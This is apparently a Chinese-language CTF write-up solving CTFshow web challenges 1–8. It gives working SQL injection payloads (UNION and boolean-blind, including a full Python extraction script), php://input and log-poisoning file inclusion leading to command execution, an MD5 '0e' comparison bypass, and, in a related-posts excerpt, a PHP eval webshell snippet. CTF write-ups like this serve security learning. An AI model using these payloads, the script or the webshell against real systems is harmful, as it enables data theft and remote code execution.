CTFshow_web1:

F12查看JS即在代码里

CTFshow_web2:

进入网址后页面如下:

①:尝试使用admin登陆,发现页面无回显

②:尝试单引号闭合,并且添加' or 1=1#,此时在后台查询语句应该为:

SELECT * FROM users where user='admin' or 1=1#&passwd=

条件为真即出现回显,如图:

③:通过查询语句【admin' or 1=1 order by x #】来判断列数,最终得到有3列

④:因为有回显,所以考虑联合查询注入,查询语句为【admin' or 1=1 union select 1,2,3 #】,显示如下,所以2号位有回显

⑤:通过2号位回显去获取数据库更多的信息,具体查询语句如下:

admin' or 1=1 union select 1,database(),3 #
admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
admin' or 1=1 union select 1,group_concat(column_name),3 from
information_schema.tables where table_name='flag' #
admin' or 1=1 union select 1,group_concat(flag),3 from flag #

⑥:依次回显结果如下:

database:web2
tables:flag,user
column:flag
ctf:ctfshow{7b448282-01e0-47d2-8b8a-4fbe3bc76ebb}

CTFshow_web3:

①:打开页面后发现是一个文件包含的题目:

②:尝试访问/etc/passwd,/var/log/nginx/access.log

③:尝试日志包含写入一句话木马,发现被过滤了敏感字符:<>()[]''

③:使用伪协议php://input,写入操作指令,又考虑到是GET请求,所以在burp里抓包修改:

返回结果如下:

ctf_go_go_go index.php

再次使用伪协议查询:

得到旗帜:

ctfshow{bea28caa-2287-4360-b9a9-3a3516f33476}

知识点回顾:

php://input伪协议:php://input 是个可以访问请求的原始数据的只读流。通俗来讲是将文件包含漏洞变成命令执行,一般与POST结合,与GET结合在Burp里使用较方便

CTFshow_web4:

同web3,只不过过滤了php等协议,使用日志注入可以得到,通过蚁剑或者菜刀连接,得到Flag

CTFshow_web5:

打开网页后发现是一条代码审计的题目,关键语句如下:

<?php
$flag="";
$v1=$_GET['v1'];
$v2=$_GET['v2'];
if(isset($v1) && isset($v2)){
if(!ctype_alpha($v1)){
die("v1 error");
}
if(!is_numeric($v2)){
die("v2 error");
}
if(md5($v1)==md5($v2)){
echo $flag;
}
}else{ echo "where is flag?";
}
?>

题目要求位v1,v2 md5编码同,但是v1得是全字符,v2得是全数字

考虑md5碰撞,即v1,v2md5后均以0e开头

则输入

http://fe4405b1-ecd4-4cab-ba59-ec5e20bf9dfc.chall.ctf.show:8080/?v1=QNKCDZO&v2=240610708

获得旗帜

CTFshow_web6:

字符型注入,过滤空格,用/**/替换即可其他步骤同web2

CTFshow_web7:

字符型注入,过滤了空格,双引号

http://3ce03932-8cc0-4775-bd47-8917c5efd019.chall.ctf.show:8080/?id=1'/**/union/**/select/**/1,database(),group_concat(flag)/**/from/**/flag#

CTFshow_web8:

考查的是bool盲注,并且过滤了空格,双引号,构造payload进行自动化脚本注入

注意点:

①:自动化脚本的核心是payload,首先要判断字符型注入和数字型注入,然后根据正确的payload去跑代码

②:当过滤了 (0,1)时,可以使用from 0,for 1,过滤了双引号可以使用16进制进行替换

#!/usr/bin/python
#-*- encoding: utf-8 -*-
import requests
url="http://1c2fdfff-d246-41dd-8e8a-70b65692521d.chall.ctf.show:8080/index.php?id=-1"
dbPayload="/**/or/**/ascii(substr(database()/**/from/**/{0}/**/for/**/1))={1}"
tbPayload="/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/{0}/**/for/**/1))={1}"
cuPayload="/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)/**/from/**/{0}/**/for/**/1))={1}"
alPayload="/**/or/**/ascii(substr((select/**/group_concat(flag)/**/from/**/flag)/**/from/**/{0}/**/for/**/1))={1}"
def Getal(url):
Gurl=url+alPayload
print("开始破解所有元素:")
Allname=""
for i in range(1,100):
temp_len=len(Allname)
for j in range(41,128):
Durl=Gurl.format(i,j)
r=requests.get(Durl)
if 'By Rudyard Kipling' in r.text:
Allname+=chr(j)
print("破解中的元素名:",Allname)
break
if temp_len==len(Allname):
print("破解成功,旗帜为:",Allname)
break
return Allname
def Dable(url):

Durl = url + dbPayload
print("开始破解数据库:")
Dablename=""
for i in range(1,50):
temp_len=len(Dablename)
for j in range(41,128):
Turl=Durl.format(i,j)
r=requests.get(Turl)
if 'By Rudyard Kipling' in r.text:
Dablename+=chr(j)
print("破解中的数据库名:",Dablename)
break
if temp_len==len(Dablename):
print("破解成功,数据库名为:",Dablename)
break
return Dablename
def Table(url):
Aurl=url+tbPayload
Tablename=""
print("开始破解数据表:")
for i in range(1,50):
temp_len=len(Tablename)
for j in range(40,128):
Turl=Aurl.format(i,j)
r=requests.get(Turl)
if 'By Rudyard Kipling' in r.text:
Tablename+=chr(j)
print("破解中的数据表名",Tablename)
break
if temp_len==len(Tablename):
print("破解成功,数据库表名为:",Tablename)
break
return
def Cuable(url):
Mnurl=url+cuPayload
Cumname=""
print("开始破解数据列:")
for i in range(1,50):
temp_len=len(Cumname)
for j in range(40,128):
Courl=Mnurl.format(i,j)
r=requests.get(Courl)
if 'By Rudyard Kipling' in r.text:
Cumname+=chr(j)
print("破解中的数据列名",Cumname)
break
if temp_len==len(Cumname):
print("破解成功,数据列名为:",Cumname)
break
return Cumname
if __name__ == '__main__':

Dable(url)
Table(url)
Cuable(url)
Getal(url)

反思:web8如果使用暴力破解花费的时间较大,其实可以使用二分法,大幅度缩短运行时间,并且在判断页面是否正确还可以通过判断返回文章长度,例如:

success_len=len(requests.get(url).text)
....
....
for i in range(1,50):
for j in range(40,128):
Courl=Mnurl.format(i,j)
r=len(requsets,get(Courl).text)
if r==success_len:
......

此外使用range()函数比使用字典判断更好一方面代码更加美观,另一方面避免字典遗漏部分字符的问题

Ctf_show Web[1-8]的更多相关文章

  1. CTF_show平台 web题解 part3

    web13 题目显示文件上传,各类型上传均提示错误,在使用ctf-scan扫描的时候,发现upload.php.bak. 查看源码: <?php header("content-typ ...

  2. CTF_show平台 web题解 part2

    web10 WITH ROLLUP 绕过 点击取消键弹出源码下载: 源码如下: <?php $flag=""; function replaceSpecialChar($st ...

  3. CTF_show平台 web题解 part1

    web3 题目描述: 方法一:RFI 使用url实现php远程文件包含 在服务器上构造1.txt <?php $a = "<?php eval(\$_POST['123'])?& ...

  4. C# Web应用调试开启外部访问

    在用C#开发Web应用时有个痛点,就是本机用VS开启Web应用调试时外部机器无法访问此Web应用.这里将会介绍如何通过设置允许局域网和外网机器访问本机的Web应用. 目录 1. 设置内网访问 2. 设 ...

  5. 网页提交中文到WEB容器的经历了些什么过程....

    先准备一个网页 <html><meta http-equiv="Content-Type" content="text/html; charset=gb ...

  6. 闲来无聊,研究一下Web服务器 的源程序

    web服务器是如何工作的 1989年的夏天,蒂姆.博纳斯-李开发了世界上第一个web服务器和web客户机.这个浏览器程序是一个简单的电话号码查询软件.最初的web服务器程序就是一个利用浏览器和web服 ...

  7. java: web应用中不经意的内存泄露

    前面有一篇讲解如何在spring mvc web应用中一启动就执行某些逻辑,今天无意发现如果使用不当,很容易引起内存泄露,测试代码如下: 1.定义一个类App package com.cnblogs. ...

  8. 对抗密码破解 —— Web 前端慢 Hash

    (更新:https://www.cnblogs.com/index-html/p/frontend_kdf.html ) 0x00 前言 天下武功,唯快不破.但在密码学中则不同.算法越快,越容易破. ...

  9. 使用 Nodejs 搭建简单的Web服务器

    使用Nodejs搭建Web服务器是学习Node.js比较全面的入门教程,因为要完成一个简单的Web服务器,你需要学习Nodejs中几个比较重要的模块,比如:http协议模块.文件系统.url解析模块. ...

随机推荐

  1. python工业互联网应用实战5—Django Admin 编辑界面和操作

    1.1. 编辑界面 默认任务的编辑界面,对于model属性包含"choices"会自动显示下来列表供选择,"datetime"数据类型也默认提供时间选择组件,如 ...

  2. rockchip的yocto编译环境搭建

    作者:良知犹存 转载授权以及围观:欢迎添加微信公众号:Conscience_Remains 总述   嵌入式的朋友们,应该知道Linux驱动开发过程中,需要进行搭建交叉编译工具链环境.移植u-boot ...

  3. VS CODE远程办公篇一

    作者:良知犹存 转载授权以及围观:欢迎添加微信:becom_me 总述     因为疫情的来临,让远程办公变得原来越火.这次我也是盯上了这个功能,实现在家里远程配置电脑. 嵌入式Linux开发的程序员 ...

  4. D - D (最短路解决源点到多点,多点到源点的和(有向图))

    问从1号点到各个点的距离+各个点到1号点之间的距离和的最小值 In the age of television, not many people attend theater performances ...

  5. Codeforces Round #697 (Div. 3) D. Cleaning the Phone (思维,前缀和)

    题意:你的手机有\(n\)个app,每个app的大小为\(a_i\),现在你的手机空间快满了,你需要删掉总共至少\(m\)体积的app,每个app在你心中的珍惜值是\(b_i\),\(b_i\)的取值 ...

  6. Codeforces Round #649 (Div. 2) B. Most socially-distanced subsequence (数学,差分)

    题意:有一长度为\(n\)的数组,求一子序列,要求子序列中两两差的绝对值最大,并且子序列尽可能短. 题解:将数组看成坐标轴上的点,其实就是求每个单调区间的端点,用差分数组来判断单调性. 代码: #in ...

  7. 二叉排序树的构造 && 二叉树的先序、中序、后序遍历 && 树的括号表示规则

    二叉排序树的中序遍历就是按照关键字的从小到大顺序输出(先序和后序可没有这个顺序) 一.以序列 6 8 5 7 9 3构建二叉排序树: 二叉排序树就是中序遍历之后是有序的: 构造二叉排序树步骤如下: 插 ...

  8. 吉哥系列故事――恨7不成妻 HDU - 4507

    题目: 单身! 依然单身! 吉哥依然单身! DS级码农吉哥依然单身! 所以,他生平最恨情人节,不管是214还是77,他都讨厌! 吉哥观察了214和77这两个数,发现: 2+1+4=7 7+7=7*2 ...

  9. PowerShell随笔5---添加.NET类型

    有些情况下,有些脚本命令不能满足我们的需求,而手头却能用C#很方便的实现. 我们就可以把自定义的类型Add到PowerShell中使用,使用方法和PowerShell调用.NET类库方法是一样的. 以 ...

  10. Selenium刚玩一会儿,就感受了私人秘书的体验

    学习python的过程中,少不了接触第三方库,毕竟作为胶水语言python的强大之处也就是第三方库体量庞大,无疑大大增强了python的战斗力. 有时候想完成网页自动化操作,这时候Selenium进入 ...